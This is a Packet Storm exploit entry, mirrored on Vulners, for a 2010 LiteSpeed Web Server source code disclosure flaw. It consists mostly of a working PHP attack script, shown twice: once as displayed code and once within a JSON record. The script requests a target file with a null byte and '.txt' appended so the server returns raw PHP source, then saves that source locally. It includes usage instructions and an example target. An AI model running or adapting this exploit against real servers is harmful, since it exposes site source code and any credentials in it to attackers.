Search...

litespeedsource-disclose.txt

2010-07-03T00:00:00

ID PACKETSTORM:91295
Type packetstorm
Reporter Burtay
Modified 2010-07-03T00:00:00

Description

                                        
                                            ` &lt;?php  
/*  
* LiteSpeed Web Server Remote Source Code Disclosure Exploit  
* Usage : php exploit.php domain.com /path  
* example : php exploit.php burtay.org index.php  
* Coded By Burtay  
* Special Thanks RMx And Megaturks Crews  
*/  
echo "\n -&gt;LiteSpeed Web Server Remote Source Code Disclosure Exploit&lt;-\n\nStarting\n";  
$fp = fsockopen($argv[1], 80, $errno, $errstr, 30);  
if (!$fp)   
{  
echo "$errstr ($errno)&lt;br /&gt;\n";  
}   
else {  
$out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";  
$out .= "Host: ".$argv[1]."\r\n";  
$out .= "Connection: Close\r\n\r\n";  
fwrite($fp, $out);  
while (!feof($fp)) {  
$gelen = fgets($fp, 128);  
$dosya = str_replace("/","-",$argv[2]);  
$ac = fopen($argv[1]."-".$dosya,'ab');  
fwrite($ac,$gelen);  
fclose($ac);  
}  
echo "Dosya ".$dosya." adi ile kaydedildi\n";  
echo "Coded By Burtay\n";  
echo "Burtay.Org\n";  
echo "Megaturks.Net\n";  
fclose($fp);  
}  
?&gt; `

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:91295", "type": "packetstorm", "bulletinFamily": "exploit", "title": "litespeedsource-disclose.txt", "description": "", "published": "2010-07-03T00:00:00", "modified": "2010-07-03T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/91295/litespeedsource-disclose.txt.html", "reporter": "Burtay", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:43", "viewCount": 1, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2016-11-03T10:28:43", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:43", "rev": 2}, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/91295/litespeedsource-disclose.txt", "sourceData": "` <?php \n/* \n* LiteSpeed Web Server Remote Source Code Disclosure Exploit \n* Usage : php exploit.php domain.com /path \n* example : php exploit.php burtay.org index.php \n* Coded By Burtay \n* Special Thanks RMx And Megaturks Crews \n*/ \necho \"\\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\\n\\nStarting\\n\"; \n$fp = fsockopen($argv[1], 80, $errno, $errstr, 30); \nif (!$fp) \n{ \necho \"$errstr ($errno)<br />\\n\"; \n} \nelse { \n$out = \"GET /\".$argv[2].\"\\x00.txt HTTP/1.1\\r\\n\"; \n$out .= \"Host: \".$argv[1].\"\\r\\n\"; \n$out .= \"Connection: Close\\r\\n\\r\\n\"; \nfwrite($fp, $out); \nwhile (!feof($fp)) { \n$gelen = fgets($fp, 128); \n$dosya = str_replace(\"/\",\"-\",$argv[2]); \n$ac = fopen($argv[1].\"-\".$dosya,'ab'); \nfwrite($ac,$gelen); \nfclose($ac); \n} \necho \"Dosya \".$dosya.\" adi ile kaydedildi\\n\"; \necho \"Coded By Burtay\\n\"; \necho \"Burtay.Org\\n\"; \necho \"Megaturks.Net\\n\"; \nfclose($fp); \n} \n?> `\n", "immutableFields": []}